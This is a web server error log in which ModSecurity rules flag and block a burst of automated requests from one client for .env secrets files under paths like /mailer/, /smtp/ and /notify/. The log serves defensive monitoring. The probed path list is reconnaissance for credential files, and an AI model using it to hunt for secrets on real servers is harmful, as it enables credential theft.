[Mon May 11 14:10:23.843206 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/cache/.env"] [unique_id "agHHL-JEyNRN152ArORzpQAAAFI"]
[Mon May 11 14:10:23.843387 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/cache/.env"] [unique_id "agHHL-JEyNRN152ArORzpQAAAFI"]
[Mon May 11 14:10:23.843640 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/cache/.env"] [unique_id "agHHL-JEyNRN152ArORzpQAAAFI"]
[Mon May 11 14:10:24.132351 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/mailer/.env"] [unique_id "agHHMOJEyNRN152ArORzpgAAAFI"]
[Mon May 11 14:10:24.132674 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mailer/.env"] [unique_id "agHHMOJEyNRN152ArORzpgAAAFI"]
[Mon May 11 14:10:24.132852 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mailer/.env"] [unique_id "agHHMOJEyNRN152ArORzpgAAAFI"]
[Mon May 11 14:10:24.133083 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mailer/.env"] [unique_id "agHHMOJEyNRN152ArORzpgAAAFI"]
[Mon May 11 14:10:24.424484 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/mail/.env"] [unique_id "agHHMOJEyNRN152ArORzpwAAAFI"]
[Mon May 11 14:10:24.424869 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mail/.env"] [unique_id "agHHMOJEyNRN152ArORzpwAAAFI"]
[Mon May 11 14:10:24.425052 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mail/.env"] [unique_id "agHHMOJEyNRN152ArORzpwAAAFI"]
[Mon May 11 14:10:24.425319 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mail/.env"] [unique_id "agHHMOJEyNRN152ArORzpwAAAFI"]
[Mon May 11 14:10:24.694965 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /email/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/email/.env"] [unique_id "agHHMOJEyNRN152ArORzqAAAAFI"]
[Mon May 11 14:10:24.695367 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/email/.env"] [unique_id "agHHMOJEyNRN152ArORzqAAAAFI"]
[Mon May 11 14:10:24.695552 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/email/.env"] [unique_id "agHHMOJEyNRN152ArORzqAAAAFI"]
[Mon May 11 14:10:24.695808 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/email/.env"] [unique_id "agHHMOJEyNRN152ArORzqAAAAFI"]
[Mon May 11 14:10:25.008257 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /smtp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/smtp/.env"] [unique_id "agHHMeJEyNRN152ArORzqQAAAFI"]
[Mon May 11 14:10:25.008629 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/smtp/.env"] [unique_id "agHHMeJEyNRN152ArORzqQAAAFI"]
[Mon May 11 14:10:25.008817 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/smtp/.env"] [unique_id "agHHMeJEyNRN152ArORzqQAAAFI"]
[Mon May 11 14:10:25.009040 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/smtp/.env"] [unique_id "agHHMeJEyNRN152ArORzqQAAAFI"]
[Mon May 11 14:10:25.273918 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/mailing/.env"] [unique_id "agHHMeJEyNRN152ArORzqgAAAFI"]
[Mon May 11 14:10:25.274335 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mailing/.env"] [unique_id "agHHMeJEyNRN152ArORzqgAAAFI"]
[Mon May 11 14:10:25.274535 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mailing/.env"] [unique_id "agHHMeJEyNRN152ArORzqgAAAFI"]
[Mon May 11 14:10:25.274773 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mailing/.env"] [unique_id "agHHMeJEyNRN152ArORzqgAAAFI"]
[Mon May 11 14:10:25.558234 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notifications/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/notifications/.env"] [unique_id "agHHMeJEyNRN152ArORzqwAAAFI"]
[Mon May 11 14:10:25.558717 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/notifications/.env"] [unique_id "agHHMeJEyNRN152ArORzqwAAAFI"]
[Mon May 11 14:10:25.558966 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/notifications/.env"] [unique_id "agHHMeJEyNRN152ArORzqwAAAFI"]
[Mon May 11 14:10:25.559268 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/notifications/.env"] [unique_id "agHHMeJEyNRN152ArORzqwAAAFI"]
[Mon May 11 14:10:25.824084 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/notify/.env"] [unique_id "agHHMeJEyNRN152ArORzrAAAAFI"]
[Mon May 11 14:10:25.824499 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/notify/.env"] [unique_id "agHHMeJEyNRN152ArORzrAAAAFI"]
[Mon May 11 14:10:25.824700 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/notify/.env"] [unique_id "agHHMeJEyNRN152ArORzrAAAAFI"]
[Mon May 11 14:10:25.824942 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/notify/.env"] [unique_id "agHHMeJEyNRN152ArORzrAAAAFI"]
[Mon May 11 14:10:26.118605 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sender/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/sender/.env"] [unique_id "agHHMuJEyNRN152ArORzrQAAAFI"]
[Mon May 11 14:10:26.118986 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/sender/.env"] [unique_id "agHHMuJEyNRN152ArORzrQAAAFI"]
[Mon May 11 14:10:26.119180 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/sender/.env"] [unique_id "agHHMuJEyNRN152ArORzrQAAAFI"]
[Mon May 11 14:10:26.119441 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/sender/.env"] [unique_id "agHHMuJEyNRN152ArORzrQAAAFI"]
[Mon May 11 14:10:26.209607 2026] [core:error] [pid 1320398:tid 1320405] [client 52.242.216.199:59555] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:26.209909 2026] [core:error] [pid 1320398:tid 1320405] [client 52.242.216.199:59555] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
